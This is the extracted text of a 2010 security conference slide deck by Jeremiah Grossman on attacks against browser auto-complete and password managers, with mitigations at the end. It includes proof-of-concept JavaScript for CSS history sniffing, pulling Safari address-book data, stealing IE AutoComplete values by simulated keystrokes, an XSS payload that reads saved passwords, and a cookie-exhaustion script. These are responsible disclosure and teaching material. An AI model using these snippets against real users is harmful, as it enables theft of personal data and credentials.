Date post: | 18-Nov-2014 |
Category: |
Technology |
Upload: | jeremiah-grossman |
View: | 18,261 times |
Download: | 1 times |
Breaking Browsers: Hacking Auto-CompleteJeremiah GrossmanFounder & Chief Technology Officer
Blog: http://jeremiahgrossman.blogspot.com/Twitter: http://twitter.com/jeremiahgEmail: [email protected] special thanks to:
Robert “RSnake” Hansen (SecTheory)Daniel Veditz (Mozilla)Microsoft Security Response CenterMike Bailey (MAD Security)Chris Evans (Google)
© 2010 WhiteHat Security, Inc. | Page 2
• WhiteHat Security Founder & Chief Technology Officer
• 2010 RSA Security Bloggers Award (Best Corporate Blog)
• InfoWorld's CTO Top 25 (2007)
• 5th most popular “Jeremiah” according to Google
• Brazilian Jiu-Jitsu Brown Belt
• Narcissistic Vulnerability Pimp
• Former Yahoo! information security officer
me.
© 2010 WhiteHat Security, Inc. | Page 3
Web Security
Browser SecurityWebsite Security
2,000+ websites
© 2010 WhiteHat Security, Inc. | Page
Global Internet: 1.67 Billion People
4
Internet
1.67 billion peoplehttp://en.wikipedia.org/wiki/Global_Internet_usage
206 millionwebsites
© 2010 WhiteHat Security, Inc. | Page 5
Largest Market-share
Exploiting Features Enabled by Default
Bonus for Design Flaws
What the “bad guys” target...
© 2010 WhiteHat Security, Inc. | Page 6
July, 2010http://www.netmarketshare.com/browser-market-share.aspx?qprid=2
Browser Version Market Share
© 2010 WhiteHat Security, Inc. | Page 7
By the numbers, of people
IE 8 IE 6 FF 3.5/3.6 IE 7 Chrome Safari 4/5
491 Million
284 Million
351 Million
197 Million
103 Million
83 Million
36 Mil307 Mil
© 2010 WhiteHat Security, Inc. | Page 8
Sandboxes, code security, memory protection, black-lists, green URL bars, anti-phishing, SSL warnings, etc.
Security Features
© 2010 WhiteHat Security, Inc. | Page 9
I know where you’ve been... (on the way out)
FF 3.7 Nightlies Safari v5
http://blog.mozilla.com/security/2010/03/31/plugging-the-css-history-leak/http://jeremiahgrossman.blogspot.com/2006/08/i-know-where-youve-been.html
VisitedUnvisited
a:visited#link { background: url('/capture.cgi?http://bank/'); }
Classic CSS History Hack
var color = document.defaultView.getComputedStyle(link,null).getPropertyValue("color");
In the “visited” pseudo-class, everything except color style properties are ignored.
getComputedStyle lies and returns the “unvisited” link values.
© 2010 WhiteHat Security, Inc. | Page 10
We often still know where you are logged-in, but that’s another discussion.
CSRF Login-Detection
© 2010 WhiteHat Security, Inc. | Page 11
I want to know your name, who you work for, where you live, your email address, etc.Right at the moment you a visit a website. Even if you’ve never been there before, let alone entered information.
© 2010 WhiteHat Security, Inc. | Page 12
© 2010 WhiteHat Security, Inc. | Page 13
Safari Address Book Autofill (enabled by default)
<form><input type="text" name="name"><input type="text" name="company"><input type="text" name="city"><input type="text" name="state"><input type="text" name="country"><input type="text" name="email"></form>
© 2010 WhiteHat Security, Inc. | Page 14
Address Card Autofill works even when you’ve NEVER entered personal data on ANY WEBSITE.
© 2010 WhiteHat Security, Inc. | Page
DEMO
15
Step 1) Dynamically create input fields with the pre-set attribute names.
Step 2) Cycle through the alphabet initiating text events until a form value populates.
Step 3) Profit! -- Steal data with JavaScript.
var event = document.createEvent('TextEvent');event.initTextEvent('textInput', 1, 1, null, char);
input.value = "";input.selectionStart = 0;input.selectionEnd = 0;input.focus();input.dispatchEvent(event);!!setTimeout(function() { if (input.value.length > 1) { // capture the value; }}, 500);
Safari v4 / v5
*transparency is even more fun!*
© 2010 WhiteHat Security, Inc. | Page 16
What about stealing other auto-fill data, data that was previously entered?
© 2010 WhiteHat Security, Inc. | Page 17
Internet Explorer 8 = SAFE
© 2010 WhiteHat Security, Inc. | Page 18
AutoComplete: User-supplied form values are shared across different websites by attribute “name”. For example, email addresses entered into a field on website A populates the autofill for the same field name on website B, C, D, etc.
<input type="text" name="email">
© 2010 WhiteHat Security, Inc. | Page 19
DEMO - Down, Down, Enter// hit down arrow an incrementing number of times.// separate with time to allow the GUI to keep pacefor (var i = 1; i <= downs; i++) { time += 30; // time padding keyStroke(this, 40, time); // down button}! !time += 15; // time paddingkeyStroke(this, 13, time); // enter button
// initiate keystroke on a given objectfunction keyStroke(obj, code, t) { //create new event and fire var e = document.createEventObject(); e.keyCode = code; setTimeout(function() {obj.fireEvent("onkeydown", e); }, t);} // end keyStroke
Security Basis, and an Internet Explorer data stealerhttp://webreflection.blogspot.com/2008/09/security-basis-and-internet-explorer.htmlAndrea Giammarchi, Ajaxian Staff
© 2010 WhiteHat Security, Inc. | Page 20
Search termsCredit card numbers and CCVsAliasesContact informationAnswers to secret questionsUsernamesEmail addresses...
© 2010 WhiteHat Security, Inc. | Page 21
AutoComplete is NOT enabled by default, but Internet Explorer asks if the user if they would like to enable the feature after filling out a non-password form.
© 2010 WhiteHat Security, Inc. | Page 22
<script>function fillAutoComp() { var num = Math.floor(Math.random()*1000000); document.getElementById('email').value = “Spoof-” + num; setTimeout("document.getElementById('me').submit(); fillAutoComp();",2);}</script>
<form id=”me” method="post" action="/" target="my_iframe"><input type="text" name="email" id="email" value="" size=140><input type="button" onclick="fillAutoComp()" value="Start"></form><iframe name="my_iframe"></iframe>
**
Sometimes we can’t read auto-complete, but we can write to it (a lot)!
\
https://bugzilla.mozilla.org/show_bug.cgi?id=578879
© 2010 WhiteHat Security, Inc. | Page 23
Have the email address, but need the password
© 2010 WhiteHat Security, Inc. | Page
Remember Password
24
Many Web Browsers have “password managers,” which provide a convenient way to save passwords on a “per website” basis.
<form method="post" action="/">E-Mail: <input type="text" name="email"><br />Password: <input type="password" name="pass"><br /><input type="submit" value="Login"></form>
function stealCreds() { var string = "E-Mail: " + document.getElementById("u").value; string += "\nPassword: " + document.getElementById("p").value; return string;}document.write('<form method="post" action="/">E-Mail: <input id="u" type="text" name="email" value=""><br>Password: <input id="p" type="password" name="password" value=""></form>');
setTimeout('alert(stealCreds())', 2000);
© 2010 WhiteHat Security, Inc. | Page 25
If a website with a saved password is vulnerable to XSS, the payload can dynamically create login forms, which executes the browser’s password auto-complete feature. Since the payload is on the same domain the username / password can be stolen.
DEMO**
© 2010 WhiteHat Security, Inc. | Page
Hidden Firefox Protection
26
about:config
signon.autofillForms
© 2010 WhiteHat Security, Inc. | Page
Long-term problem, even when “fixed”
27
Mass distribute auto-complete code (ad network), cookie affected users with a unique ID, and setup a callback Web service.
DOMAIN: whoisthispersonvar person = {name: ‘name’,email: ‘name’,}
identify(person);
DOMAIN: website<script>function identify (person) {...}</script><script src=”http://iknowyourname.com/?cb=identify”>
© 2010 WhiteHat Security, Inc. | Page28
Need help deleting your cookies?
the users way...
© 2010 WhiteHat Security, Inc. | Page 29
Firefox: Global 3,000 cookie max cap. 50 cookies can be set per hostname. Therefore, we need 1 domain with 60 subdomains.
https://bugzilla.mozilla.org/show_bug.cgi?id=321624http://kuza55.blogspot.com/2008/02/understanding-cookie-security.htmlhttp://www.nczonline.net/blog/2008/05/17/browser-cookie-restrictions/
<script>for (var i = 1; i <= 60; i++) { img = new Image(); img = "http://the" + i + ".cookiemonster.com/cgi-bin/cookie.pl";}</script>
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT";Set-Cookie: cNAME_1=_cValue_1;Set-Cookie: cNAME_2=_cValue_2;Set-Cookie: cNAME_3=_cValue_3;...
The Hackers Way - (Cookie Exhaustion)
© 2010 WhiteHat Security, Inc. | Page 30
$300 dollar hack
© 2010 WhiteHat Security, Inc. | Page 31
Disable Auto-Complete in the Web browser
Remove persistent data (History, Form Data, Cookies, LocalStorage, etc.)
NoScript (Firefox Extension), 1Password, etc.
<form autocomplete="off"><input type="text" autocomplete="off" />
What to do...
© 2010 WhiteHat Security, Inc. | Page 32
Jeremiah GrossmanFounder & Chief Technology Officer
Blog: http://jeremiahgrossman.blogspot.com/Twitter: http://twitter.com/jeremiahgEmail: [email protected]
Questions?